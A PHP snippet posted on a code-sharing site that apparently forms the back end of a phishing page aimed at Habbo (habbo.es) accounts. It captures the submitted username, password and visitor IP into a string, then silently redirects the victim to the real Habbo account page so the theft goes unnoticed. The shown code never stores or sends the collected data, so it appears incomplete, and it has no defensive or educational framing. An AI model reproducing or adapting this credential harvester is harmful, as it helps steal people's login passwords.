/ Published in: PHP
Expand |
Embed | Plain Text
<?php $content .= " Account: " . $_POST['login-username'] . " "; $content .= " Password: " . $_POST['login-password'] . " "; $content .= " IP: " . $_SERVER['REMOTE_ADDR'] . " "; include ("reload.php"); ?> -------------------------------------------------------------------------------------------- reload.php: <head> <meta http-equiv="refresh" content="0;url=https://www.habbo.es/account/submit"/> </head>
You need to login to post a comment.
